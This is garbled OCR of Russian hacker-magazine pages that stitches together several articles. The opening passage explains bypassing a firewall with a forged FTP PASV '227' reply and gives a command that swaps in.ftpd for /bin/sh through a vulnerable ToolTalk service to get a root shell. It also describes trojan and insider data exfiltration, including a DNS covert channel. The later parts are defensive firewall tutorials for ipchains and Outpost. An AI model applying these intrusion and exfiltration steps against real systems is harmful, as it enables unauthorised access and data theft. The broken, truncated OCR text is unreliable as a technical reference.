случае фаерволл следит за сообщениями сервера в поисках 227-го кода 
ответа, который выглядит Kak «227 (1,2,3,4,10,11)», что 
расшифровывается как положительный ответ на команду PASV для 
открытия соединения для передачи данных с сервером 1.2.3.4, порт 2571 
(10*256+11). Наша задача - заставить ftp-cepBep выдать такой ответ, а 
фаерволл - его принять. Один из способов это проделать - добиться, 
чтобы переданные нами данные были возвращены сервером (например, 
как сообщение об ошибке), а 227-й ответ начинался на границе пакета. 
Тогда с точки зрения фаерволла это будет выглядеть, как вполне 
нормальный ответ сервера, и доступ по указанному порту будет открыт 
(само собой, по этому порту будет что-то нам интересное). Для удобства 
контроля за расположением данных в пакете мы уменьшим MTU на 
интерфейсе, через который мы посылаем данные до 100 байт. (MTU - 
максимальный размер пакета, который может передаваться через 
интерфейс). Вот как это может выглядеть (ftp-cepBep находится по 
адресу 172.16.0.2): 


# /sbin/ifconfig ethO mtu 100 

# nc -vw 172.16.0.2 21 

(UNKNOWN) [172.16.0.2] 21 (?) open 
220 sol FTP server (SunOS 5.6) ready. 
227 (172,16,0,2,128,7) 

500’ 

[1]+ Stopped nc -vw 172.16.0.2 21 


В этот момент мы можем соединиться сервером по порту 32775 
(128*258+7), в случае, если на той стороне установлен Solaris 2.6, на этом 
порту сидит дырявый ToolTalk сервис, который мы теперь можем поиметь. 
Некоторые реализации фаерволла позволяют передавать данные по 
такому открытому порту только в одном направлении - к серверу, так что 
для окончательного успеха нам нужен такой ToolTalk, который выполнит, 
например, такие операции: 

«cp /usr/sbin/in.ftpd /tmp/in.ftpd.back ; rm -f /usr/sbin/in.ftpd ; cp 
/bin/sh /usr/sbin/in.ftpd». 

В результате следующее соединение к этому серверу по 21-му порту даст 
нам root shell. 


Теперь посмотрим, как можно передать инфу изнутри сети, прикрытой 
фаерволлом. Естественно, для этого нужно иметь помощника - например, 
трояна или живого человека, готового продать информацию изнутри, но 
не готового носить внутрь дискетки/винты (например, из-за строгого 
пропускного режима). 

В самом простом случае все исходящие соединения, сделанные с 
внутренних машин наружу, будут работать. В таком случае информацию 
можно просто переслать. В случае с трояном - он установит соединение 
наружу, по которому ему будут передавать команды, что делать дальше, 
например, установить еще одно соединение и все данные из него 
перенаправить для выполнения cmd.exe (или другим локальным шеллом, 
если троян не для windows). 

В чуть более сложном случае - исходящие соединения будут разрешены 
только на определенные порты (например, 80-й - для http); этот случай 
почти так же тривиален, как и предыдущий. Всего лишь нужно заставить 
троян соединяться с твоим серваком по 80-му порту. Ну, или человеку пе- 
редавать данные на 80-й порт. В общем, если из внутренней сети есть дос- 
туп в Internet и внутри есть помощник - информацию утаить невозможно. 
Рассмотрим один из полупараноидальных случаев - никаких прямых 
соединений с Интернетом установлено быть не может, доступ в Интернет 
через запароленный ргоху с мониторингом, кто куда ходит и что передает. 
В таком случае информацию можно передать, например... через DNS! 
Простейший пример: регистрируется домен mydomain.ru, на 
обслуживающем его сервере имен устанавливается специальный софт. 
(Стороны договариваются (либо создатель трояна встраивает его в троян) 
о секретном протоколе обмена, например, запрос к aN.mydomain.ru 
означает единицу, а к DN.mydomain.ru означает ноль, передаваемый со 
стороны внутренней сети. N - любое число (чтобы не получать ответы из 
кеша - число меняется каждый раз). Запрос на ZN.mydomain.ru служит 
для получения информации от внешнего хоста. Информация передается, 
например, как один из двух IP-agpecos. 

Указанная схема довольно примитивна. Чуваки из dereference написали 
полноценный туннель, который будет работать в случае, если единственный 
доступный Internet сервис - это DNS. Их тулза предназначена, в основном, 
для получения халявного Инета через демо-аккаунты буржуйских ISP (само 
собой, где-то в Инете нужно иметь и сервер со вторым концом туннеля). 
(качать исходники тулзы можно с http://nstx.dereference.de/. Удачи тебе 
в спортивной ловле халявы! 
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Что, дружище, пропало желание? Заплати налоги 

и живи спокойно. К несчастью, если тебя задолбали стада 
отморозков, в изобилии пасущихся на просторах 
Интернета и желающих поиметь тебя и твой Инет, 

то этот трюк с налогами не пройдет, и тебе пора ставить 
и конфигурировать firewall. Для любителей покувыркаться 
с фонетикой есть другое название - брандмауэр, 

а твой преподаватель информатики называет его 
межсетевым экраном. 


Tony (tony@nifti.unn.ru), ICQ: 


4TO TAKOE FIREWALL? 


В общем смысле - это софтина или железяка, которая фильтрует 
проходящие через нее 1р-пакеты, используя при этом набор правил, 
составленных разработчиками и дополненных тобою. Фильтрация 
пакетов заключается в том, что файрволл смотрит в заголовок пакета 
(между прочим, он еще может анализировать содержимое пакета, T.e., 
собственно говоря, саму передаваемую информацию), сопоставляет его 
с заданными правилами и разрешает или запрещает прохождение пакета 
внутрь сети, во внешний мир или к локальным процессам. Не упущу 
очередной повод пнуть Билла в причинное место - в Мпих’е механизм 
файрволла встроен в ядро и является неотъемлемой частью 
операционки, в отличие от виндузы, где за хороший межсетовой экран 
приходится платить нехилое количество америкосских президентов 
(ну... в Буржундии так считают :)). Управление этим механизмом 
осуществляется при помощи специализированного софта. В ядрах, 
начиная с 2.1.х, используется утилита ipchains, начиная с ядер 2.4.x, 
появилась новая прога - iptables, функционирующая Ha тех же 
принципах. Кроме фильтрации пакетов ipchains позволяет также 
конфигурировать несколько полезных вещей: маскарадинг (подмена 
параметров в заголовках 1р-пакетов) и прозрачное проксирование 
(переадресация 1р-пакетов на другой порт). 


КАК ЗАПУСТИТЬ ЕГО? 

Очень просто, достаточно записать символ «1» в файл 
«/proc/sys/net/ipv4/ip_forward»; соответственно, для того чтобы остано- 
вить, необходимо записать туда же символ «0»: «echo 1 > 


/proc/sys/net/ipv4/ip_forward». Имеет смысл записать эту команду в один 
из стартовых скриптов. Что-то не работает? Проверить это просто - если 
есть файл «/proc/net/ip_fwchains» то все чики-пуки. Если нет, то необхо- 
димо сконфигурировать ядро для работы с фаерволлом, а дальше действо- 
вать по инструкции номер 609258/инд. 8965 МО РФ для компиляции и ус- 
тановки ядра :)). Опции ядра, которые необходимо сконфигурировать, 
следующие: «CONFIG_FIREWALL = у», «CONFIG_IP_FIREWALL = у», «CON- 
FIG_IP_FIREWALL_NETLINK = у» (направляет копии пакетов программам 
мониторинга), «CONFIG_IP_MASQUERADE = у» (включает маскарадинг), 
«CONFIG_IP_TRANSPARET_PROXY = у» (включает прозрачный прокси). 


В Linux’e механизм файрволла встроен в ядро и 
является неотьемлемой частью операционки, в 
отличие от виндузы, где за хороший 

межсетевой экран приходится платить нехилое 
количество америкосских президентов. 


рис. Ольга и Алексей Шамардины 


КАК РАБОТАЕТ FIREWALL? 


По умолчанию имеются три встроенные цепочки (chains) правил (rules): 
входная (input), выходная (output) и пересылочная (forward). Можно 
дополнять их своими цепочками. Каждая цепочка состоит из правил. 
Каждое правило содержит условие и действие, которое необходимо 
произвести с пакетом, если он удовлетворяет условию. Если пакет не 
соответствует условию, то проверяется следующее правило цепочки. Если 
все условия исчерпаны, задействуется политика (policy) цепочки. 

Так подожди-ка, я уже запутался, а как файрволл определяет, по какой 
цепочке проверять пакет? Все очень просто, как апельсин... Если пакет 


приходит из внешнего мира (скажем, no Ethernet карте или по момеду) и 
предназначен драндулету, на котором работает firewall (а вернее - локальным 
процессам), то он проверяется по входной цепочке. Если же, наоборот, пакет 
был создан локальным процессом и предназначен для внешнего мира, то он 
проверяется по выходной цепочке. Если же пакет приходит из внешнего мира, 
но предназначен другим компам, тогда он проверяется по пересылочной 
цепочке. Правда, тут есть одна хитрость - этот механизм (пересылочный) не 
будет работать в том случае, если в ядре запрещена маршрутизация (т.е. 
передача пакета с одного компа на другой - фактически с одного сетевого 
интерфейса на другой), в этом случае пакет будет разрушен. 


КОЛБАСИМСЯ С ЦЕПОЧКАМИ 


Сначала научимся создавать новые цепочки, это делается при помощи 
команды «ipchains -N имя_цепочки». При этом имя цепочки не должно 
превышать восьми символов, а также не должно совпадать со 
стандартными именами цепочек и операций (input, output, forward, ACCEPT, 
DENY, REJECT, MASQ, REDIRECT, RETURN). Кроме того, рекомендуется 
задавать имена цепочек в нижнем регистре. 

Даже в том случае, если ты безвылазно проводишь свою жизнь в танке, ты 
должен понимать, что, кроме создания цепочки, у тебя должна быть и 
возможность пристукнуть ее в темном уголке твоей (или чужой :)) 
операционки. Тут тебе на помощь приходит заветная буква Х (прикинь, 
насколько она многолика, эта великая буква русского и латинского 
шрифта!). Соответственно команда, которая позволяет тебе выполнить это 
магическое деяние, выглядит так: «ipchains -Х имя_цепочки». Удаление 
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цепочки произойдет в том случае, если она существует, она пустая (т.е. в 
ней нет ни одного правила), а также если в других цепочках нет правил, 
ссылающихся на нее. 

А как я удалю цепочку, если она не пустая? Очень просто - ее надо 
пропылесосить от правил, а вернее отправососить :). Это делается с 
помощью команды «ipchains -F имя_цепочки». И будь осторожен, если ты 
не укажешь имя цепочки, то ко всем правилам во всех цепочках придет в 
гости безоговорочный звездец. 

Просматриваются цепочки по команде «<ipchains -L имя_цепочки». Если 
имя не указано, то будут показаны все цепочки. Вместе с флагом -L можно 
также указывать следующие флаги: -п (не преобразовывать ТР-адреса в 
символьные), -у (дополнительная инфа по правилам, счетчики пакетов и 
байт), -х (получить точные численные значения, например, вместо 2K bytes 
будет написано 2048 bytes). 

Обнуление счетчиков происходит по команде «ipchains -7 имя_цепочки». 
Как можно догадаться, если имя цепочки не задано, то обнуляться будут 
счетчики всех цепочек. Наконец, политику цепочки можно определить с 
помощью команды «ipchains -Р имя_цепочки политика». Политика бывает 
ACCEPT (принять), DENY (грохнуть) и REJECT (злобно грохнуть, т.е. грохнуть 
и отправить уведомление отправителю). Политика может задаваться 
только для встроенных (built-in) цепочек - входной, выходной и 
пересылочной. Для пересылочной цепочки также возможно значение 
политики MASQ, но я тебе рекомендую забыть об этом значении, если ты 
хочешь нормальной безопасности. 


МХ-ПРЕДОХРАНИЛОВО 


Внутри цепочек есть правила для пакетов, 
у которых, в свою очередь, есть условия, на 
которые проверяется пакет в этом правиле, 
и если он удовлетворяет этому правилу, 

то совершается определенное действие. 


Так, дружище, я забыл сказать, что за звери такие - «счетчики»? Сщас гляну 
в документацию... шутка :). Когда пакет начинает просматриваться в 
цепочке и проверяется для каждого правила, то, если он удовлетворяет 
условию, счетчик байт для этого правила увеличивается на размер пакета 
(плюс размер заголовка), а также на единицу увеличивается счетчик 
пакетов для данного правила. 


ПРАВОВОЕ ПОЛЕ 


Итак, ты уже научился создавать и убивать цепочки, теперь покопаемся у 
них в требухе. Внутри цепочек у тебя есть правила для пакетов, у которых 
в свою очередь есть условия, на которые проверяется пакет в этом правиле, 
и если он удовлетворяет этому правилу, то совершается определенное 
действие. С правилами ты можешь выполнять следующие операции: 

- добавлять новое правило в конец списка правил («ipchains -А 
имя_цепочки»); 

- вставлять новое правило на определенное место в цепочке («ipchains -1 
имя_цепочки номер_места»); 

- заменять указанное правило в цепочке («ipchains -К имя_цепочки 
номер_места»); 

- удалять правило в указанной позиции («ipchains -D имя_цепочки 
номер_места»); 

- удалять правило, соответствующее условию, - это когда тебе в лом искать 
номер нужного правила, и ты вместо номера указываешь условие («ipchains 
-D имя_цепочки условие»). Правда, если в цепочке есть несколько 


одинаковых правил, на встречу с создателем отправится только первое 
правило. 

Совершая эти действия, ты должен помнить, что каждое правило имеет свой 
порядковый номер, и при удалении правила из середины цепочки или 
вставки туда нового правила все нижележащие правила уменьшат или 
увеличат свои номера на единицу. 

Ок, наконец наш пакет попал в правило, и теперь он проверяется на 
соответствующее условие: 

- Пакет должен иметь указанный адрес отправителя (флаг «-s 
адрес_отправителя»), адреса могут указываться в виде символического 
адреса (www.xakep.ru), в виде IP-agpeca (192.168.10.78), в виде 1Р-адреса 
с численной маской (192.168.10.0/255.255.255.0 - иными словами говоря, 
192.168.10.*), а также в виде ТР-адреса с битовой маской (192.168.10.0/24 
то же самое, что и 192.168.10.0/255.255.255.0, нуа 192.168.10.0/16 - то же 
самое, что и 192.168.10.0/255.255.0.0); если тебе надо указать все адреса, 
можно использовать такое написание - 192.168.10.0/0 (при этом адрес 
192.168.10.0 может быть АБСОЛЮТНО любым); 

- Пакет должен иметь указанный адрес получателя 
адрес_получателя»), формат адреса такой же, как и у флага -5. 
- Инверсия указанного условия (! - например, «ipchains -5 ! 
www.lamers.com»). 

- Указанный протокол («ipchains -р TCP -d 192.168.10.78/0 ! 80», эта запись, 
K примеру, значит - все пакеты протокола ТСР, кроме пакетов, адресованных 
на 80-ый порт), помимо протокола можно также задать и номер порта 
(можно символическое имя порта, загляни в файл сервисов «/etc/servic- 
е5»). Также можно указывать диапазоны портов - 21:80 (если пропущена 
первая цифра, т.е. - :80, то имеются в виду все порты вплоть до 80-ого). 

- Интерфейс (флаг -i), к интерфейсам также применима инверсия, 
например «-i ! lo» будет значить «все интерфейсы, кроме lo». До кучи ты 
можешь указывать группу интерфейсов «-1 eth+», это будет означать все 
интерфейсы, имена которых начинаются с «eth». 

- TCP SYN пакеты (-y) - это пакеты с запросом на установление 

ТСР соединения. Они могут применяться только в правилах с 

ТСР протоколом (например так: «-р ТСР -5 0.0.0.0/0 -у», что 

означает принимать ТСР SYN пакеты с любого адреса). 


(флаг «-4 


раде 023 


Текущие правила цепочки (или цепочек) 
можно сохранить при помощи утилиты 
«ipchains-save имя_цепочки > имя_файла»; 
если вдруг забудешь указать имя цепочки, 
не волнуйся - сохранятся правила для всех 
цепочек. А если ты забыл указать имя 
файла, то извини, твой танк припаркован на 
запасном пути :). 
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- Только фрагменты пакетов (-f). Если пакет превышает по своему размеру 
MTU (Maximum Transfer Unit - максимальный размер), то он 
фрагментируется - разбивается на несколько пакетов, которые 
пересылаются по отдельности (на одной стороне разбираются, а на другой 
- собираются). На нашем файрволле эти пакеты можно собирать - 
дефрагментировать (для задействования этой опции ядра необходимо 
установить «CONFIG_IP_ALWAYS_DEFRAG = у») и транзитом отправлять их 
дальше. Вот тут и вылезает, аки гад из-под коряги, простая проблема - в 
первом фрагменте пакета лежит заголовок, а в остальных нет. Будь 
осторожен - злобные досеры могут закормить тебя обрывками пакетов, 
такие методы существуют, так что без нужды не запускай дефрагментатор. 
Вот почти все условия, которые тебе могут понадобиться, (я, правда, не 
рассказал о типах и кодах для протокола ТСМР, но о них прочитаешь по 
ссылкам, которые указаны чуть ниже). 

Наконец, мы определились что за пакет нам пришел, и теперь надо принять 
решение, что же с ним делать. Для этого существуют шесть специальных 
действий плюс два дополнительных. Специальные действия задаются 
флагом -j: 

- АССЕРТ - принять пакет. 

- DENY - грохнуть. 

- REJECT - издевательски грохнуть, т.е. послать отправителю ТСМР-пакет о 
совершенном деянии (при условии, что проверяемый пакет не был ICMP- 
пакетом). 

- MASQ - замаскарадить пакет, действует только для пересылочной цепочки 
и при условии, что ядро поддерживает маскарадинг. 

- КЕОТВЕСТ - применить прозрачное проксирование, т.е. отправить пакет на 
указанный порт локальной машины (возможно только во входной цепочке, 
формат «-j REDIRECT номер_порта»). 

- RETURN - применить к этому пакету политику цепочки. 

Если после -j ты укажешь действие, отличное от этих шести, то пакет 
начнется проверяться по указанной тобою цепочке (после флага -j), по 
завершении проверки по пользовательской цепочке проверка 
продолжится по текущей цепочке правил. 

Кроме этих общих переходов, ты можешь записать в логи пришедший тебе 
пакет (флаг -1) и изменить тип обслуживания пакета (-t), а еще... Ладно, 


хватит, это уже совсем необязательные фишки 
welcome2rtfm). 


ПОЛЕЗНЫЕ ХИНТЫ 


Прикинь, дружище, что ты полезешь разбираться на уже работающий 
файрволл со своим энтузазизмом великого конфигуратора. Готов 
поспорить на ящик «Балтики»-пятерки и упаковку кальмаров, что у тебя с 
первого раза мало чего стоящего получится, а вот угробить текущую 
конфигурацию - это запросто. Но не волнуйся, если ты будешь 
предохраняться, то и твой волк будет сыт и овечки мало пострадают (да и 
пастуху вечная память!)... Ведь текущие правила цепочки (или цепочек) 
можно сохранить при помощи утилиты «ipchains-save имя_цепочки > 
имя_файла»; если вдруг забудешь указать имя цепочки, не волнуйся - 
сохранятся правила для всех цепочек. А если ты забыл указать имя файла, 
то извини, твой танк припаркован на запасном пути :). Ну а раз можно 
сохранить правила, то со стороны разработчиков было бы верхом глупости, 
если их нельзя было бы загрузить - «ipchains-restore < имя_файла». 

Очень аккуратным нужно быть и с ТСМР-пакетами. 1СМР-протокол используется 
для распознавания ошибок в других протоколах, и если ты будешь грохать, не 
задумываясь, его пакетики, то цикл, запрашивающий соединение с сервантом, 
который будет орать что-нибудь вроде «Ой, вы знаете, а я ведь сегодня 
анричибл», никогда не получит этой мессаги, а следовательно, будет мотаться и 
мотаться... Тот же ICMP используется для определения MTU (максимального 
размера пакета), и если ты фрагментируешь свои пакеты, а ТСМР-пакеты не 
пролетают, то сервант на другом конце провода не получит сообщения о 
фрагментации пакетов. Соответственно - нужная тебе тр3-шка так и не 
придет, сколько бы ты ни молился Биллу. 

Во время процесса конфигурации тебя могут подстерегать и другие 
опасности - злобный хацкер может проникнуть в конфигурируемую тобой 


(любопытным - 


систему, поэтому имеет смысл перед началом конфигурации запретить весь 
траффик, например, так - «ipchains -I input 1 -j DENY» (это надо повторить 
для всех встроенных цепочек). После завершения процесса конфигурации 
убери эти правила - «ipchains -D input 1». Кроме того, для проверки правил 
ты можешь послать фиктивный пакет командой с параметром «-C». Пример 
- «ipchains -C input -p ТСР -s 0.0.0.0/0 -d 192.168.10.78/80», по этой 
команде сгенерируется для входной цепочки ТСР пакет с произвольным 
адресом отправителя и с адресом получателя 192.168.10.78 для порта 80. 
Если он пройдет все проверки и уйдет адресату, To ipchains ответит - 
«Packet accepted», а в противном случае - «Packet rejected». 


ОБЩАЯ БЕЗОПАСНОСТЬ 


На любых уровнях человеческой жизнедеятельности, начиная с банального 
пикапа симпатичных подруг и кончая нашими файрволлами, - есть два 
основных принципа, называй их как хочешь, но от этого их суть не 
изменится: 

- что не запрещено, то - разрешено; 

- и наоборот, что не разрешено, то запрещено. 

Хорошие системы безопасности строятся по второму принципу, кривые - по 
первому. Мотай на ус. 


КОНЧАЛО 


Я надеюсь, твой мозг не воспалился от потока вылитой инфы, а если ты 
хочешь добавки, лезь сюда - http://www.opennet.ru/docs/135.shtml. 
Сомневаюсь, что представленной здесь инфы будет мало, ну а если так, то 
да поможет тебе man и ipchains-HOWTO. И помни, что паранойя это не 


порок, а образ жизни. 
= 
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Качать здесь: http://www.agnitum.com/products/outpost/. Ham Ha выбор 
дают 2 версии Free и Pro. Первая, соответственно, бесплатная, за вторую 
придется заплатить. Во имя существования великой халявы описывать бу- 
ду бесплатную версию со всеми подробностями и наворотами. Первым де- 
лом после установки перегрузись, поскольку прога работает на достаточно 
низком уровне с сетевухой/модемом. Ставится он, к счастью, на все MSWin 
платформы от 95 до XP, так что качать для 98 отдельно, а для XP/NT отдель- 
но тебе не придется. Русский интерфейс опять же делает ее более разго- 
ворчивой. Очень жаль, что на сайте разработчиков не осталось старых вер- 
сий, в которых была опция debug, пользуя которую, можно было переделать 
программку в маленький снифер, так сказать, «для себя» (гы, ради такого 
дела я держу копию той самой версии на http://www.dronich.nm.ru :) - 
прим. ред.). Лично мной Аутпост ставился без каких-либо глюков на 98, 
NT4, ХР. На ХР ставил сразу после установки оной для успокоения разнооб- 


ОБЩИЕ НАСТРОЙКИ 


ом прога падает в «режим обучения», совет 
зовании на домашней тачке, много лишнего спрашивать она не 
придется ставить на гейте или серваке, то можно сделать наст- 
равить ее в «режим блокировки» или «режим разрешения», в 
и от целей установки. Первым делом лезем в меню параметров 
а первой странице ставим везде галочки, если еще не стоят. В 
бираем (если стоит) галочку Ha NetBIOS, в «тип ответа» ставим 
Все, первое дело сделано, можно выходить на полосу препятст- 


НАСТРОЙКА ПОД ПРИЛОЖЕНИЯ 


В отличие от NetStat, в OutPost ты можешь посмотреть не только, какие пор- 
ты открыты, но и кто именно их открыл. Добавить эту строчку можно пра- 
вым кликом по «Моя сеть», это очень удобно для поимки троянов. При пер- 
вых же соединениях некие: RPCSS, он же DCOM, ICQSRP, он же баннер для 
аськи, пытаются установить соединения. Для них смело выбирай «запре- 
тить любые действия», ибо нефиг кому попало твой трафик жрать. У меня в 
запрещенных еще и Winamp болтается, достал своей «более новой» верси- 
ей. Туда же посылай всякие «AUTOUPD» и «AUPDRUN», приспичит, сам ска- 
чаешь :). Если ставишь Outpost под XP, то есть еще один немаловажный мо- 
мент, данная система очень любит стучать Билли. Для пресечения этого по- 
сле первого выхода в сеть просто подожди, как только начнут появляться 
запросы во внешний мир, смело режь их, ябедничать нехорошо! Пусть при- 
выкает это изнеженное американское дитятко жить в наших постсоветских 
условиях. 


ЛИЧНЫЕ НАСТРОЙКИ 


Теперь начинаем знакомить наш OutPost со всеми пр 
ем мылер, файрволл начинает яростно орать. На что 
щемся меню мы объясняем ему, что это e-mail clien 
объясняем, что это browser. И так по очереди. Конеч 
руками и нудно прописать все порты, для всех програ 
меню, пусть работает. Тетя Ася настраивается в автома 
потом отрезал ей mail и http, мыло я ей не проверяю лачкачатьчетра 
картинки за мой счет нельзя. Все nntp клиенты, если ты их пользуешь, идут 
по разряду мылеров, позже просто кастрируем им pop и smtp, на всякий слу- 
чай. Обрезание делается в меню «приложения» в параметрах. Единствен- 
ный, кто попал не по автомату, был telnet, уж очень я люблю им на http и 
smtp коннектиться, потому повесил его в привилегированную группу «мож- 
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Трудно раскидывать пальцы в сети, если сам падаешь 
от первого толчка ламера, скачавшего себе Voidozer и 
даже не представляющего себе, как он работает. Еще 
труднее спокойно спать, будучи админом сервака под МТ 
или 2000. Но есть счастье у виндусятников, его надо 
только скачать и настроить :). 


рис. Борис Алексеев 


но все». В эту же ложу можешь определять проги, которые ты написал сам. 
Проги друзей и знакомых туда лучше не отправлять, помни, что кодер коде- 
ру - хакер, ламер и юзер :). Так что эти проги проверяй в первую голову. 


ДЛЯ ПРОГРАММИСТА 


Если ты сам активно пишешь проги, то будь готов к тому, что Outpost тебя 
достанет сообщением типа «тут кто-то говорит, что OH Project1.exe, но я то- 
го кекса в лицо знаю, это не он, что делать будем?». На период написания 
серверной или клиентской проги лучше его отрубать переводом в «режим 


твой любимый браузер уже будет более проблематично. В 
кого использования можно добавить несколько программ 
леживания изменений в них. То есть добавляем в наш 
ep, прогу «notepad.exe» и разрешаем ей коннектиться Ha 
1; как только прога изменится, нам выскочит предупрежде- 
1 ей разрешали, а она не та, что была. При этом прога может 
даже и не думать куда-либо коннектиться. Таким образом получаем про- 
стую и надежную проверялку программ. 


Разберемся для начала с первым и последним режимами, поскольку они на- 
иболее просты в понимании. Первый - это режим бездействия, а последний 
- это режим «блокировать все». Первый отключает файрволл и позволяет 
любому приложению устанавливать любые соединения, что удобно при рабо- 
те не совсем стандартных программ с использованием множественных со- 
единений. Последний отрубает все и вся, то есть ты как бы в офф-лайне, и, 
кроме ТР адреса, ничто и никто не скажет, что ты являешься частью сети. Сле- 
дующие по сложности это режим «блокировки» и режим «разрешения». Пер- 
вый включает все правила, которые явно разрешают соединения и запреща- 
ет все остальное. Второй разрешает все, что явно не оговорено как запре- 
щенное действие. Последний, в принципе устанавливаемый по умолчанию, 
это режим «обучения», то есть тебя спрашивают обо всех действиях, которые 
выполняет твой компьютер или которые пытаются выполнить с твоим ком- 
пьютером из сети. При работе в автопилоте лучше настроить все, что можно 
делать, и поставить «режим блокировки», в таком случае будет труднее сде- 
лать то, чего ты бы добровольно не разрешил :). Уже позже, если кому пона- 
добится выход по другому порту, можно будет добавить его отдельно. 


В отличие от многих файрволлов, в Outpost правила задаются для каждой 
проги отдельно. Само правило состоит из нескольких пунктов. Во-первых, 
это протокол, его выбор не велик - есть только ТСР и UDP. Во-вторых, это на- 
правление, то есть есть входящее или исходящее. Затем удаленный адрес, 


OH МОжет представлять собой ТР адрес (или несколько), который заносится 


В таблицу, или диапазон адресов, например - с 127.0.0.1 по 
127.255.255.255, диапазонов тоже может быть несколько. Если в удален- 
ный адрег написать имя домена, то Outpost дойдет до ближайшего DNS сер- 
вера И вставит в таблицу IP адрес, что при использовании в качестве запре- 
Га может отрезать не один хост, а всю пачку хостов с этим ТР адресом. Вме- 
CTO маски можеотиспольз о вать звездочки в IP адресе, то есть с 127.0.0.0 по 
127.255.855.255 бУдет эквивалентно 127.*.*.*, что удобнее использовать, 
выбирай сам. 

Четвертым на очереди пунктом идет удаленный порт, можно задать в циф- 
ровом виде, например, 21, можно в буквенном, то есть FTP, можно в виде 
диапазона (например, 104655 5)иЕслиместванеобходимоствауиказатьжниея 
сколько портов или диапазонов, то они разделяются между собой запяты- 
ми (то есть 1,12-15,21). Теперь наиболее интересная фича для настройки 
гейта, «где локальный адрес», тоесть если утебя стоит сетевуха с ПР-ШНИ- 
ком 192.168.0.1 и мопед с плавающим дайл-апом, то есть возможность раз- 
решить по сети лазить к 1ебе на винт, а Из И-нета запретить это делать. За- 
даются адреса так же, как В пункте про удаленный адрес, то есть одним IP 
или маской, диапазоном ИЛИ ПО Имени, которое переводится в 1Р’адрес. По- 
следний пункт описания COSAMHCHMA - это локальный порт. Задается так же, 
как удаленный, то есть цифрой, буквой или диапазоном, при необходимос- 
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ти разделяется запятыми. Удобно использовать при настройке локального 
сервера, особенно сервера, на который заходить можно не всем. Все, те- 
перь осталось выбрать действие по этому правилу, варианты: блокировать, 
разрешить, отклонить. Разрешить - и так понятно: если соединение удовле- 
творяет описанию, то оно разрешается. Блокирование и отклонение отли- 
чаются тем, что при блокировании высылается RST пакет, говорящий о том, 
что такого порта нет; при отклонении не делается вообще ничего, то есть 
про это соединение просто забывают. Первое обычно ставят для исходя- 
щих соединений, чтобы программка не мучалась и сразу поняла, что туда 
долбиться бесполезно. Отклонение лучше ставить на свой сервер, чтобы 
входящие извне соединения просто терялись, тогда зафлудить твой канал 
будет более трудно, поскольку твой комп не будет отсылать ответ. 

Очень грамотная фича в настройках - не обязательно указывать все прави- 
ла, можно указать только протокол, что будет означать любое направление 
и любые адрес и порт, но нельзя не указать действие, а то Outpost просто 
не будет знать, что с ним делать. 


Давай попробуем создать правило для {епе{-клиента. Заходим в приложе- 
ния или просто устанавливаем Policy в «обучение» и долбимся telnet-om по 
любому адресу. В первом случае отыскиваем наш telnet и говорим, что хо- 
тим создать правило, во втором говорим «запретить все» и идем в прило- 
жения, где перетаскиваем наш телнет из запрещенных в пользовательские. 
Теперь собственно само правило. В протоколе ставим ТСР. Направление, 
поскольку у нас клиент, ставим исходящее. Удаленный порт ставим 23 или 
пишем TELNET, или просто выбираем его в таблице и кликаем мышкой. Все, 
теперь осталось сказать «разрешить эти данные» и жать «ок». Если у нас 
несколько правил, то не забудь, что проверяются они сверху вниз, поэтому 
если ты хочешь разрешить все соединения, кроме telnet, то поставь запре- 
щающее правило повыше. Если же тебе надо запретить все, кроме НТТР, то 
разрешающее правило поставь перед запретом. В противном случае, натк- 
нувшись на первое правило и увидев соответствие, никто не станет прове- 


Е ТРОЕ ТЕТ 


рять весь список, а тупо выполнит первое приказание. Теперь давай попро- 
буем настроить что-нибудь для локального сервака, например, для apache. 
Для начала отыскиваем его и добавляем в список приложений. Теперь до- 
бавляем правило для пользователей, то есть разрешаем входящее соедине- 
ние на порты НТТР, НТТР5. Если ты пользуешь 501, то не забудь прописать 
разрешающее правило на порты 1433 и 1434 или MS_SQL_S и MS_SQL_M 
(последний порт в принципе апачу не нужен, но он на него долбится. Дятел 
:)). При использовании исходящих соединений в РНР или Perl не забудь и 
про них. Если ты хочешь открыть сервак только для локалки, то мало во 
всех правилах прописать локальный ТР адрес со звездочками или диапазон, 
надо еще запретить все остальные ТСР соединения, только поставь запрет 
ниже разрешения. Таким образом файрвольчик проверит «входящее, ТСР, 
из сетки = нет», идем дальше, а там «входящее, ТСР = да», значится - откло- 
няем его (ну или запрещаем, тут тебе решать, что лучше). 


Начнем с правил для ICQ. По умолчанию выставляются два правила на 4000 UDP 
порт для связи с сервером, два правила на ТСР 1024-65535 порт, пара для по- 
сылки и приема почты и правило для работы с НТТР. С первой парой все понят- 
но, раз с сервером ты обязан связаться, то и правило для этого необходимо. 
Правда, вместо двух можно указать одно, но не указывать направление, то же 
можно проделать и с клиентским коннектом. А вот правило про HTTP я бы уда- 
лил, вместо него более выгодно создать правило про запрет ТСР 80 и поднять его 
в иерархии повыше. Не забудь про icqsrp, ему надо запретить любые действия, 
для тотальной блокировки баннеров. Таким образом получаем вместо 5 правил 
всего 3 плюс срезаем баннеры. Лепота! 


ЗАЩИЩАЕМСЯ ПОД WIN 


(Стандартное правило для браузеров - тоже не прелесть, например, есть 
строка PASV FTP, в которой указано, что исходящее соединение разрешено 
на порты 1024-65535, что полностью перекрывает правило РКОХУ, то есть 
одно из них явно лишнее. Если же ты работаешь через проксю и только че- 
рез нее, то следует оставить единственное разрешенное соединение на 
твою проксю, а остальное потереть. Меньше будет проверять, значит быст- 
рее будет работать. В противном случае стирай правило про проксики, оно 
тебе не пригодится. Наиболее грамотно написано стандартное правило для 
Download manager, в принципе для всяких reget, flashget и прочих менять 
ничего не надо. Но если тебе досаждают баннеры, то можно запретить об- 
ращаться к конкретному серверу, а можно просто включить плуг для каст- 
рации рекламы. Мылер тоже переполнен всем, что только можно. Тут и 
NNTP, и IMAP, ну, конечно же, есть POP3/SMTP :). Лично я оторвал ему IMAP 


и NNTP, поскольку для работы с ними использую другие проги, а не свой 
сборник. Стандарты для IRC, FTP, Storage критике не подлежат, по- 


ку критиковать там, собственно, нечего. Для telnet я все же переделал 
Pky из двух строк в одну, просто переписав оба порта telnet и ssh в 
строку через запятую. В «синхронизация времени» вроде написано 
равильно, но я так и не нашел сервера, где 123 ЦОР порт был бы нужен 
акой-нибудь синхронизации :). Про NetMeeting говорить не буду, в его 
по подключению через прокси-сервер описаны все порты, именно 
занесены в список разрешенных. В общем, если ты ставишь стандарт- 
равила, то не поленись и пройдись по ним позже для удаления лиш- 
роверок. 


ЗАТЫЧКИ 


естве первой затычки нам предлагают плуг «реклама». Сам по себе до- 
